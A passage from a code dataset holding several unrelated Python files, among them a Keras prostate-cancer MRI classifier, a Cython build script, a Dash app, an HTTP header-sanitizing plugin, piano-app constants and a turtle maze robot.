'freeciv/gen_headers', 'freeciv/common', 'freeciv/common/networking', 'freeciv/server', 'freeciv/common/aicore',\n #'/usr/local/include',\n #'/usr/include'\n ]\ndepends = [#'freeciv/utility/log.h', 'freeciv/server/srv_main.h', './freeciv/common/game.h',\n #'/usr/include/bzlib.h'\n ]\nsourcefiles = ['civy.pyx',#'freeciv/common/game.c', 'freeciv/utility/log.c', 'freeciv/utility/deprecations.c'\n ]\nextensions = [\n Extension('civy', \n sourcefiles, \n include_dirs=inc_dirs,\n libraries=['freeciv'],\n extra_compile_args=[\"-fopenmp\", \n \"-O3\"],\n extra_link_args=[\"-DSOME_DEFINE_OPT\", \n \"-L/usr/include\"\n #'-framework', 'BZ'\n ]\n )]\nsetup(\n cmdclass = {'build_ext': build_ext},\n ext_modules=cythonize(extensions,\n compiler_directives={'language_level': \"3\"}),\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"190642544","text":"#----------------------------------------------------------------------\r\n# deep learning classifier using a multiple layer perceptron (MLP)\r\n# batch normalization was used\r\n# TensorBoard support:\r\n# :scalars:\r\n# - accuracy\r\n# - wieghts and biases\r\n# - cost/cross entropy\r\n# - dropout\r\n# :images:\r\n# - reshaped input\r\n# - conv layers outputs\r\n# - conv layers weights visualisation\r\n# :graph:\r\n# - full graph of the network\r\n# :distributions and histograms:\r\n# - weights and biases\r\n# - activations\r\n# :checkpoint saving:\r\n# - checkpoints/saving model\r\n# - weights embeddings\r\n#\r\n# :to be implemented:\r\n# - image embeddings (as in https://www.tensorflow.org/get_started/embedding_viz)\r\n# - ROC curve calculation (as in http://blog.csdn.net/mao_feng/article/details/54731098)\r\n#-------------------------------------------------------------------------------------------\r\n\r\nimport os\r\nimport timeit\r\nimport tensorflow\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sn\r\nimport glob2 as glob\r\nimport nibabel as nib\r\nfrom functools import partial\r\nfrom datetime import datetime\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import interp\r\nfrom itertools import cycle\r\nfrom time import gmtime, strftime\r\n\r\nimport keras\r\nfrom keras import initializers\r\nfrom keras.optimizers import RMSprop\r\nfrom keras.models import Sequential, Model\r\nfrom keras.layers import Input, Dense, Reshape, Activation, Dropout\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom keras.layers.advanced_activations import ELU, LeakyReLU\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.metrics import precision_recall_curve, auc\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.preprocessing import label_binarize\r\n\r\n\r\n\r\n# ----------------------------------------------------------------------------------\r\n# preparing data and folders\r\n# ----------------------------------------------------------------------------------\r\ndef data_path():\r\n\r\n if not os.path.exists(result_dir):\r\n print('result directory does not exist - creating...')\r\n os.makedirs(result_dir)\r\n print('log directory created...')\r\n else:\r\n print('result directory already exists 
...')\r\n\r\n    if not os.path.exists(log_dir):\r\n        print('log directory does not exist - creating...')\r\n        os.makedirs(log_dir)\r\n        os.makedirs(log_dir + '/train')\r\n        os.makedirs(log_dir + '/validation')\r\n        print('log directory created.')\r\n    else:\r\n        print('log directory already exists...')\r\n\r\n# ----------------------------------------------------------------------------------\r\n# construct train, validation and test dataset\r\n# ----------------------------------------------------------------------------------\r\nclass PCa_data(object):\r\n    \r\n    '''\r\n    construct train, validation and test datasets\r\n    '''\r\n    \r\n    def __init__(\r\n        self,\r\n        project_dir,\r\n        random_state,\r\n        test_split,\r\n        train_file_1,\r\n        train_file_2,\r\n        test_file_1,\r\n        test_file_2,\r\n        ratio_1, \r\n        ratio_2,\r\n        ratio_3,\r\n        ratio_4,\r\n        x_input\r\n    ):\r\n                        \r\n        self.project_dir = project_dir\r\n        self.random_state = random_state\r\n        self.test_split = test_split\r\n        self.train_file_1 = train_file_1\r\n        self.train_file_2 = train_file_2\r\n        self.test_file_1 = test_file_1\r\n        self.test_file_2 = test_file_2\r\n        self.ratio_1 = ratio_1\r\n        self.ratio_2 = ratio_2  \r\n        self.ratio_3 = ratio_3\r\n        self.ratio_4 = ratio_4    \r\n        self.x_input = x_input\r\n\r\n    def map_list(self):\r\n\r\n        maps_list = [\r\n            'b0_map.nii',                       #07\r\n            'dti_adc_map.nii',                  #08\r\n            'dti_axial_map.nii',                #09\r\n            'dti_fa_map.nii',                   #10\r\n            'dti_radial_map.nii',               #11\r\n            'fiber_ratio_map.nii',              #12\r\n            'fiber1_axial_map.nii',             #13\r\n            'fiber1_fa_map.nii',                #14\r\n            'fiber1_fiber_ratio_map.nii',       #15\r\n            'fiber1_radial_map.nii',            #16\r\n            'fiber2_axial_map.nii',             #17\r\n            'fiber2_fa_map.nii',                #18\r\n            'fiber2_fiber_ratio_map.nii',       #19\r\n            'fiber2_radial_map.nii',            #20\r\n            'hindered_ratio_map.nii',           #21\r\n            'hindered_adc_map.nii',             #22\r\n            'iso_adc_map.nii',                  #23\r\n            'restricted_adc_1_map.nii',         #24\r\n            'restricted_adc_2_map.nii',         #25\r\n            'restricted_ratio_1_map.nii',       #26\r\n            'restricted_ratio_2_map.nii',       #27\r\n            'water_adc_map.nii',                #28\r\n            'water_ratio_map.nii',              #29\r\n        ]\r\n        \r\n        return maps_list\r\n\r\n    def data_train_loading(self):\r\n        \r\n        df_1 = pd.read_csv(os.path.join(project_dir, self.train_file_1))\r\n        df_2 = pd.read_csv(os.path.join(project_dir, self.train_file_2))\r\n        df_train = pd.concat([df_1, df_2])\r\n\r\n        return df_train\r\n\r\n    def data_test_loading(self):\r\n        \r\n        df_5 = pd.read_csv(os.path.join(project_dir, self.test_file_1))\r\n        df_6 = pd.read_csv(os.path.join(project_dir, self.test_file_2))\r\n        df_test = pd.concat([df_5, df_6])\r\n        \r\n        return df_test\r\n\r\n    def data_train(self):\r\n        \r\n        '''\r\n        construct train dataset\r\n        '''\r\n\r\n        df_train = self.data_train_loading()\r\n\r\n        df_train['y_cat'] = 2\r\n\r\n        df_train.loc[df_train['ROI_Class'] == 't', 'y_cat'] = 1\r\n\r\n        if histology == 'Benign':\r\n            df_train.loc[df_train['ROI_Class'].isin(['p', 'c']), 'y_cat'] = 0\r\n            \r\n        else:\r\n            df_train.loc[df_train['ROI_Class'] == histology, 'y_cat'] = 0\r\n        \r\n        class0        = df_train[df_train['y_cat'] == 0]\r\n        class1        = df_train[df_train['y_cat'] == 1]\r\n\r\n        class0_sample = class0.sample(int(class0.shape[0]*self.ratio_1))\r\n        class1_sample = class1.sample(int(class1.shape[0]*self.ratio_2))\r\n\r\n        df_train_sum = pd.concat([class0_sample, class1_sample])\r\n\r\n        x_train = df_train_sum.iloc[:, self.x_input]\r\n        y_train = df_train_sum.y_cat.astype('int')\r\n\r\n        return x_train, y_train\r\n\r\n    def data_val_test(self):\r\n        \r\n        '''\r\n        construct test dataset\r\n        '''\r\n\r\n        df_test = self.data_test_loading()\r\n\r\n        df_test['y_cat'] = 2\r\n\r\n        df_test.loc[df_test['ROI_Class'] == 
't', 'y_cat'] = 1\r\n\r\n if histology == 'Benign':\r\n df_test.loc[df_test['ROI_Class'].isin(['p', 'c']), 'y_cat'] = 0\r\n \r\n else:\r\n df_test.loc[df_test['ROI_Class'] == histology, 'y_cat'] = 0\r\n \r\n class0 = df_test[df_test['y_cat'] == 0]\r\n class1 = df_test[df_test['y_cat'] == 1]\r\n\r\n class0_sample = class0.sample(int(class0.shape[0]*self.ratio_3))\r\n class1_sample = class1.sample(int(class1.shape[0]*self.ratio_4))\r\n\r\n df_test_sum = pd.concat([class0_sample, class1_sample])\r\n\r\n x_val_test = df_test_sum.iloc[:, self.x_input]\r\n y_val_test = df_test_sum.y_cat.astype('int')\r\n\r\n x_val, x_test, y_val, y_test = train_test_split(\r\n x_val_test,\r\n y_val_test,\r\n test_size=self.test_split,\r\n random_state=self.random_state\r\n )\r\n return x_val, x_test, y_val, y_test\r\n \r\n# ----------------------------------------------------------------------------------\r\n# construct DNN model with batch normalization layers and dropout layers\r\n# ----------------------------------------------------------------------------------\r\nclass Keras_model(object):\r\n \r\n def __init__(\r\n self,\r\n init,\r\n optimizer,\r\n loss,\r\n activation,\r\n dropout_rate,\r\n batch_momentum, \r\n n_inputs,\r\n n_outputs\r\n ):\r\n \r\n self.init = init\r\n self.optimizer = optimizer\r\n self.loss = loss\r\n self.dropout_rate = dropout_rate\r\n self.batch_momentum = batch_momentum\r\n self.n_inputs = n_inputs\r\n self.n_outputs = n_outputs\r\n self.activation = activation\r\n \r\n def build_model(self):\r\n \r\n model = Sequential()\r\n\r\n dense_layer = partial(\r\n Dense,\r\n init=self.init, \r\n use_bias=False,\r\n activation=None,\r\n )\r\n\r\n batch_normalization = partial(\r\n BatchNormalization,\r\n axis=-1,\r\n momentum=self.batch_momentum,\r\n epsilon=0.001,\r\n beta_initializer='zeros',\r\n gamma_initializer='ones',\r\n beta_regularizer=None,\r\n gamma_regularizer=None \r\n )\r\n \r\n # input layer \r\n model.add(dense_layer(self.n_inputs, input_dim=self.n_inputs))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 1\r\n model.add(dense_layer(n_hidden1))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 2\r\n model.add(dense_layer(n_hidden2))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 3\r\n model.add(dense_layer(n_hidden3))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 4\r\n model.add(dense_layer(n_hidden4))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 5\r\n model.add(dense_layer(n_hidden5))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 6\r\n model.add(dense_layer(n_hidden6))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 7\r\n model.add(dense_layer(n_hidden7))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 8\r\n model.add(dense_layer(n_hidden8))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 9\r\n 
model.add(dense_layer(n_hidden9))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n \r\n # hidden layer 10\r\n model.add(dense_layer(n_hidden10))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # output layer\r\n model.add(dense_layer(self.n_outputs))\r\n model.add(batch_normalization())\r\n model.add(Activation(output_activation))\r\n\r\n #model.summary()\r\n\r\n model.compile(\r\n loss=self.loss,\r\n optimizer=self.optimizer,\r\n metrics=['accuracy']\r\n )\r\n \r\n return model\r\n\r\n# ----------------------------------------------------------------------------------\r\n# trainning DNN model\r\n# ----------------------------------------------------------------------------------\r\ndef model_training():\r\n\r\n history = model.fit(\r\n x=x_train,\r\n y=y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=0,\r\n callbacks=None,\r\n validation_split=None,\r\n validation_data=(x_val, y_val),\r\n shuffle=True,\r\n class_weight=None,\r\n sample_weight=None,\r\n initial_epoch=0,\r\n steps_per_epoch=None,\r\n validation_steps=None, \r\n )\r\n\r\n score = model.evaluate(\r\n x_test,\r\n y_test,\r\n verbose=0\r\n )\r\n \r\n y_pred = model.predict(x_test)\r\n y_prob = model.predict_proba(x_test)[:,1]\r\n\r\n test_loss = score[0]\r\n test_accuracy = score[1]\r\n\r\n test_loss = np.around(test_loss, 3)\r\n test_accuracy = np.around(test_accuracy, 3)\r\n\r\n return y_pred, y_prob, test_loss, test_accuracy\r\n\r\n# ----------------------------------------------------------------------------------\r\n# ROC and AUC\r\n# ----------------------------------------------------------------------------------\r\ndef DNN_ROC():\r\n \r\n fpr = dict()\r\n tpr = dict()\r\n roc_auc = dict()\r\n threshold = dict()\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1, 1, 1)\r\n ax.set_aspect('equal')\r\n \r\n colors = cycle(['aqua', 'red', 'purple', 'royalblue'])\r\n\r\n for i, color in zip(range(len(y_prob_list)), colors):\r\n\r\n fpr[i], tpr[i], _ = roc_curve(y_test_list[i], y_prob_list[i])\r\n \r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n \r\n print('ROC AUC %.2f' % roc_auc[i])\r\n \r\n plt.plot(\r\n fpr[i],\r\n tpr[i],\r\n color=color,\r\n linewidth=3,\r\n label='AUC %0.2f' % roc_auc[i]\r\n )\r\n\r\n plt.xlim([-0.03, 1])\r\n plt.ylim([0, 1.03])\r\n ax.axhline(y=0, color='k', linewidth=4)\r\n ax.axhline(y=1.03, color='k', linewidth=4)\r\n ax.axvline(x=-0.03, color='k', linewidth=4)\r\n ax.axvline(x=1, color='k', linewidth=4) \r\n plt.xticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=14, fontweight='bold')\r\n plt.yticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=14, fontweight='bold')\r\n #plt.xlabel('False Positive Rate', fontweight='bold', fontsize=15)\r\n #plt.ylabel('True Positive Rate', fontweight='bold', fontsize=15)\r\n plt.legend(loc='lower right', prop={'size': 14, 'weight': 'bold'}) \r\n plt.grid(True)\r\n\r\n ROC_filename = 'ROC' + '_' + \\\r\n str(count) + \\\r\n str(learning_rate) + '_' + \\\r\n str(batch_momentum) + '_' + \\\r\n str(epochs) + '_' + \\\r\n str(dropout_rate) + \\\r\n str(batch_size) + \\\r\n strftime(\"%d-%b-%Y-%H-%M-%S\", gmtime()) + '.png'\r\n \r\n plt.savefig(os.path.join(result_dir, ROC_filename), format='png', dpi=600)\r\n #plt.show()\r\n plt.close()\r\n\r\n# ----------------------------------------------------------------------------------\r\n# precision recall curve\r\n# 
----------------------------------------------------------------------------------\r\ndef DNN_PRC():\r\n    \r\n    precision = dict()\r\n    recall = dict()\r\n    threshold = dict()\r\n    prc_auc = []\r\n\r\n    fig = plt.figure()\r\n    ax = fig.add_subplot(1, 1, 1)\r\n    ax.set_aspect('equal')\r\n    \r\n    colors = cycle(['aqua', 'red', 'purple', 'royalblue'])\r\n\r\n    for i, color in zip(range(len(y_prob_list)), colors):\r\n\r\n        precision[i], recall[i], _ = precision_recall_curve(y_test_list[i],\r\n                                                            y_prob_list[i])\r\n        \r\n        # sort the (recall, precision) pairs by recall so auc() gets a monotonic x-axis\r\n        RP_2D = np.array([recall[i], precision[i]])\r\n        RP_2D = RP_2D[:, np.argsort(RP_2D[0])]\r\n\r\n        prc_auc.append(auc(RP_2D[0], RP_2D[1]))\r\n        \r\n        print('PRC AUC %.2f' % prc_auc[i])\r\n        \r\n        plt.plot(\r\n            recall[i],\r\n            precision[i],\r\n            color=color,\r\n            linewidth=3,\r\n            label='AUC %0.2f' % prc_auc[i]\r\n        )\r\n\r\n    plt.xlim([0, 1.03])\r\n    plt.ylim([0, 1.03])\r\n    ax.axhline(y=0, color='k', linewidth=4)\r\n    ax.axhline(y=1.03, color='k', linewidth=4)\r\n    ax.axvline(x=0, color='k', linewidth=4)\r\n    ax.axvline(x=1.03, color='k', linewidth=4)    \r\n    plt.xticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=16, fontweight='bold')\r\n    plt.yticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=16, fontweight='bold')\r\n    #plt.xlabel('recall', fontweight='bold', fontsize=16)\r\n    #plt.ylabel('precision', fontweight='bold', fontsize=16)\r\n    plt.legend(loc='lower left', prop={'size': 14, 'weight': 'bold'}) \r\n    plt.grid(True)\r\n\r\n    PRC_filename = 'PRC' + '_' + \\\r\n                   str(count) + \\\r\n                   str(learning_rate) + '_' + \\\r\n                   str(batch_momentum) + '_' + \\\r\n                   str(epochs) + '_' + \\\r\n                   str(dropout_rate) + \\\r\n                   str(batch_size) + \\\r\n                   strftime(\"%d-%b-%Y-%H-%M-%S\", gmtime()) + '.png'\r\n    \r\n    plt.savefig(\r\n        os.path.join(result_dir, PRC_filename),\r\n        format='png',\r\n        dpi=600\r\n    )\r\n    \r\n    #plt.show()\r\n    plt.close()\r\n    \r\n# ----------------------------------------------------------------------------------\r\n# model hyper parameters\r\n# ---------------------------------------------------------------------------------- \r\nif __name__ == '__main__':\r\n\r\n    # model parameters\r\n    alpha = 0.3\r\n    random_state = 42\r\n    ELU_alpha = 1.0\r\n    digit = 3\r\n    test_split = 0.5\r\n    count = 0\r\n    x_input = range(7, 30)\r\n    n_inputs = len(x_input)\r\n    n_outputs = 2\r\n    n_classes = n_outputs\r\n    ratio_1 = 1.0\r\n    ratio_2 = 1.0\r\n    ratio_3 = 1.0\r\n    ratio_4 = 1.0\r\n\r\n    Learning_rate = [0.01, 0.1]\r\n    Momentum = [0.9]\r\n    Dropout_rate = [0.3]\r\n    Batch_size = [500]\r\n    Epochs = [5]\r\n    N_neurons = [100]\r\n    histology_list = ['p', 'c', 'Benign']\r\n    \r\n    n_neurons = 100\r\n    n_hidden1 = n_neurons\r\n    n_hidden2 = n_neurons\r\n    n_hidden3 = n_neurons\r\n    n_hidden4 = n_neurons\r\n    n_hidden5 = n_neurons\r\n    n_hidden6 = n_neurons\r\n    n_hidden7 = n_neurons\r\n    n_hidden8 = n_neurons\r\n    n_hidden9 = n_neurons\r\n    n_hidden10 = n_neurons\r\n\r\n    # model functions\r\n    init = 'he_uniform'              \r\n    optimizer = 'adam'          \r\n    loss = 'sparse_categorical_crossentropy'\r\n    output_activation = 'softmax'\r\n    activation = ELU(alpha=ELU_alpha)  \r\n    \r\n    '''\r\n    kernel initializer: 'he_uniform', 'lecun_normal', 'lecun_uniform'\r\n    optimizer function: 'adam', 'adamax', 'nadam', 'sgd'\r\n    loss function: 'categorical_crossentropy'\r\n    activation function: LeakyReLU(alpha=alpha)\r\n    '''\r\n\r\n    # data and results path   \r\n    project_dir = r'\\\\10.39.42.102\\temp\\Prostate_Cancer_Project_Shanghai\\PCa_Machine_Learning\\PCa_Benign_Classification\\data'\r\n    result_dir = 
r'\\\\10.39.42.102\\temp\\Prostate_Cancer_Project_Shanghai\\PCa_Machine_Learning\\PCa_Benign_Classification\\result'\r\n log_dir = r'\\\\10.39.42.102\\temp\\Prostate_Cancer_Project_Shanghai\\PCa_Machine_Learning\\PCa_Benign_Classification\\log'\r\n \r\n train_file_1 = 'benign_mpMRI.csv'\r\n train_file_2 = 'PCa_train.csv'\r\n test_file_1 = 'benign_biopsy.csv'\r\n test_file_2 = 'PCa_test.csv'\r\n\r\n # ----------------------------------------------------------------------------------\r\n # run the model\r\n # ----------------------------------------------------------------------------------\r\n \r\n print(\"Deep Neural Network for PCa grade classification: start...\")\r\n\r\n start = timeit.default_timer()\r\n\r\n data_path()\r\n\r\n total_run = len(Momentum)*len(Epochs)*len(Batch_size)*len(Learning_rate)*len(N_neurons)\r\n\r\n breaking = False\r\n\r\n for i in Batch_size:\r\n \r\n for j in Momentum:\r\n \r\n for k in Epochs:\r\n\r\n for l in Learning_rate:\r\n\r\n for m in N_neurons:\r\n\r\n for n in Dropout_rate:\r\n\r\n count += 1\r\n\r\n print('\\nRunning times: ' + str(count) + '/' + str(total_run))\r\n\r\n x_test_list = []\r\n y_test_list = []\r\n y_prob_list = []\r\n y_pred_list = []\r\n loss_list = []\r\n accuracy_list = []\r\n\r\n batch_size = i\r\n batch_momentum = j\r\n epochs = k\r\n learning_rate = l\r\n n_neurons = m\r\n dropout_rate = n\r\n\r\n PCa_Data = PCa_data(\r\n project_dir,\r\n random_state,\r\n test_split,\r\n train_file_1,\r\n train_file_2,\r\n test_file_1,\r\n test_file_2,\r\n ratio_1, \r\n ratio_2,\r\n ratio_3,\r\n ratio_4,\r\n x_input\r\n )\r\n\r\n model = Keras_model(\r\n init,\r\n optimizer,\r\n loss,\r\n activation,\r\n dropout_rate,\r\n batch_momentum,\r\n n_inputs,\r\n n_outputs\r\n ).build_model()\r\n\r\n for histology in histology_list:\r\n\r\n x_train, y_train = PCa_Data.data_train()\r\n \r\n x_val, x_test, y_val, y_test = PCa_Data.data_val_test()\r\n \r\n x_test_list.append(x_test)\r\n y_test_list.append(y_test)\r\n\r\n for x_test, y_test in zip(x_test_list, y_test_list):\r\n\r\n y_pred, y_prob, test_loss, test_accuracy = model_training()\r\n \r\n y_prob_list.append(y_prob)\r\n y_pred_list.append(y_pred)\r\n loss_list.append(test_loss)\r\n accuracy_list.append(test_accuracy)\r\n\r\n DNN_ROC()\r\n DNN_PRC()\r\n\r\n print('\\noverall loss: ', loss_list)\r\n print('overall accuracy:', accuracy_list)\r\n print('epochs: ', epochs)\r\n print('batch size: ', batch_size)\r\n print('dropout rate: ', dropout_rate)\r\n print('batch momentum: ', batch_momentum)\r\n print('learning rate: ', learning_rate)\r\n print('neuron numbers: ', n_neurons)\r\n \r\n if test_accuracy > 0.999:\r\n breaking = True\r\n\r\n if breaking == True:\r\n break\r\n\r\n if breaking == True:\r\n break\r\n \r\n if breaking == True:\r\n break\r\n\r\n if breaking == True:\r\n break\r\n\r\n if breaking == True:\r\n break\r\n\r\n print('train size: ', len(x_train))\r\n print('validation size:', len(x_val))\r\n print('test size: ', len(x_test))\r\n \r\n stop = timeit.default_timer()\r\n running_seconds = np.around(stop - start, 0)\r\n running_minutes = np.around(running_seconds/60, 0)\r\n print('DNN running time:', running_seconds, 'seconds')\r\n print('DNN running time:', running_minutes, 'minutes')\r\n\r\n","sub_path":"2020_PCa_Project/Keras_PCa_invivo_ROC_PRC.py","file_name":"Keras_PCa_invivo_ROC_PRC.py","file_ext":"py","file_size_in_byte":26281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64501619","text":"from factory import 
CappuccinoFactory, BlackCoffeeFactory, LemonadeFactory, HotMilkFactory, CocaColaFactory\r\nfrom customization import Customization\r\nfrom preparation import Preparation\r\n\r\nwhile True:\r\n factory_cappuccino = CappuccinoFactory()\r\n factory_black_coffee = BlackCoffeeFactory()\r\n factory_lemon = LemonadeFactory()\r\n factory_milk = HotMilkFactory()\r\n factory_coca_cola = CocaColaFactory()\r\n\r\n cust = Customization(float(input(\"Extra milk - \")), float(input(\"Sugar - \")), float(input(\"Mug size - \")))\r\n cust = (cust.extra_milk, cust.sugar, cust.mug_size)\r\n\r\n prep = Preparation(float(input(\"Milk - \")), float(input(\"Water - \")), float(input(\"Sugar - \")),\r\n float(input(\"Coke - \")), float(input(\"Coffee - \")), float(input(\"Flavour - \")),\r\n float(input(\"Tea - \")))\r\n prep = (prep.milk, prep.water, prep.sugar, prep.coke, prep.liquid_coffee, prep.added_flavour, prep.tea)\r\n\r\n cappuccino = factory_cappuccino.get_product()\r\n black_coffee = factory_black_coffee.get_product()\r\n lemon = factory_lemon.get_product()\r\n milk = factory_milk.get_product()\r\n coca_cola = factory_coca_cola.get_product()\r\n\r\n cappuccino.make(cappuccino, cust, prep)\r\n cappuccino.set_milk()\r\n cappuccino.set_sugar()\r\n cappuccino.set_coffee()\r\n print(\"\\n\")\r\n black_coffee.make(black_coffee, cust, prep)\r\n black_coffee.set_water()\r\n black_coffee.set_coffee()\r\n print(\"\\n\")\r\n lemon.make(lemon, cust, prep)\r\n lemon.set_water()\r\n lemon.set_sugar()\r\n lemon.set_lemon_juice()\r\n print(\"\\n\")\r\n milk.make(milk, cust, prep)\r\n milk.set_milk(cust[0])\r\n print(\"\\n\")\r\n coca_cola.make(coca_cola, cust, prep)\r\n coca_cola.set_water()\r\n coca_cola.set_coke()","sub_path":"lab 3(Kramar)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"272705368","text":"import os\nimport dash\n\nfrom layout import create_layout\n\napp = dash.Dash(\n __name__,\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width\"}],\n external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'],\n)\n\nserver = app.server # the Flask app\napp.layout = create_layout(app) # Dash layout\n\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"329983566","text":"from transformer.helpers import zip_kv_pairs\nfrom transformer.plugins import plugin, Contract\nfrom transformer.task import Task2\n\n\n@plugin(Contract.OnTask)\ndef plugin(task: Task2) -> Task2:\n \"\"\"\n Removes Chrome-specific, RFC-non-compliant headers starting with `:`.\n Converts header names to lowercase to simplify further overriding.\n Removes the cookie header as it is handled by Locust's HttpSession.\n \"\"\"\n headers = task.request.headers\n\n if not isinstance(headers, dict):\n headers = zip_kv_pairs(headers)\n\n sanitized_headers = {\n k.lower(): v\n for (k, v) in headers.items()\n if not k.startswith(\":\") and k.lower() != \"cookie\"\n }\n\n task.request = task.request._replace(headers=sanitized_headers)\n\n return task\n","sub_path":"transformer/plugins/sanitize_headers.py","file_name":"sanitize_headers.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"276680011","text":"WINDOW_WIDTH = 
560\nMODE_SELECTOR_HEIGHT = 50\nCONTROLS_FRAME_HEIGHT = 100\nKEYBOARD_HEIGHT = 160\nSCORE_DISPLAY_HEIGHT = 110\nWINDOW_HEIGHT = KEYBOARD_HEIGHT + CONTROLS_FRAME_HEIGHT + \\\n MODE_SELECTOR_HEIGHT + SCORE_DISPLAY_HEIGHT\n\nCHOICES = ['Scales','Chords','Chord Progressions']\n\nWHITE_KEY_IMAGE = '../pictures/white_key.gif'\nWHITE_KEY_PRESSED_IMAGE = '../pictures/white_key_pressed.gif'\nBLACK_KEY_IMAGE = '../pictures/black_key.gif'\nBLACK_KEY_PRESSED_IMAGE = '../pictures/black_key_pressed.gif'\n\nALL_KEYS = ['C1','C#1','D1','D#1','E1','F1','F#1','G1','G#1','A1', \\\n 'A#1','B1', 'C2','C#2','D2','D#2','E2','F2','F#2','G2',\\\n 'G#2','A2','A#2','B2']\nKEYS = ['C','C#','D','D#','E','F','F#','G','G#','A','A#','B']\n\nWHITE_KEY_NAMES = ['C1','D1', 'E1', 'F1', 'G1','A1', 'B1', \\\n 'C2','D2', 'E2', 'F2', 'G2','A2', 'B2']\n\nBLACK_KEY_NAMES = ['C#1', 'D#1', 'F#1', 'G#1', 'A#1', 'C#2', 'D#2', \\\n 'F#2', 'G#2', 'A#2']\n\nWHITE_KEY_X_COORDINATES = [0,40, 80,120, 160, 200, 240,280, 320, 360, \\\n 400, 440, 480,520]\nBLACK_KEY_X_COORDINATES = [30,70,150,190, 230, 310, 350, 430,470, 510]\n\nSCALES_JSON_FILE = '../json/scales.json'\nCHORDS_JSON_FILE = '../json/chords.json'\nPROGRESSIONS_JSON_FILE = '../json/progressions.json'\n\nROMAN_TO_NUMBER = { 'I':0, 'II': 2, 'III':4, 'IV':5, 'V': 7, 'VI':9, 'VII': 11,\n'i':0, 'ii': 2, 'iii':4, 'iv':5, 'v': 7, 'vi':9, 'vii': 11\n}\t\n","sub_path":"Chapter 07/7.07/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"551521001","text":"import turtle\nimport maze\nrobo = turtle.Turtle('turtle')\nheadings = [90, 0, 270, 180]\nsize = 210\nscreen = turtle.Screen()\nscreen.setworldcoordinates(-size, -size, size, size)\nscreen.tracer(0)\n\ndef draw_screen():\n a = turtle.Turtle()\n a.hideturtle()\n screen.tracer(0)\n a.pu()\n a.goto(-100, -200)\n a.pd()\n a.goto(100, -200)\n a.goto(100, 200)\n a.goto(-100, 200)\n a.goto(-100, -200)\n screen.tracer(1)\n\n\ndef draw_square(x, y):\n a = turtle.Turtle()\n a.hideturtle()\n screen.tracer(0)\n a.pu()\n a.goto(x, y)\n a.pd()\n a.seth(0)\n a.begin_fill()\n for _ in range(4):\n a.fd(4)\n a.lt(90)\n a.end_fill()\n screen.tracer(1)\n\ndef validate_pos(r, dist: int, user_input: str):\n \"\"\"Validates the position of the robot \"\"\"\n args = user_input.lower().split(' ', 1)\n new = r.pos[r.direction%2] + int(args[1])*(-1 if r.direction > 1 else 1)*(-1 if 'back' in args else 1)\n if r.direction%2 == 0:\n if (-200 <= new <= 200) == False:\n print(f\"{r.name}: Sorry, I cannot go outside my safe zone.\")\n return False\n else:\n if (-100 <= new <= 100) == False:\n print(f\"{r.name}: Sorry, I cannot go outside my safe zone.\")\n return False\n if r.direction%2 == 0:\n pos = maze.is_position_blocked(r.pos[1], new)\n path = maze.is_path_blocked(r.pos[1], r.pos[0], r.pos[1], new)\n else:\n pos = maze.is_position_blocked(new, r.pos[0])\n path = maze.is_path_blocked(r.pos[1], r.pos[0], new, r.pos[0])\n if pos or path:\n print(f\"{r.name}: Sorry, I cannot go outside my safe zone.\")\n return False\n 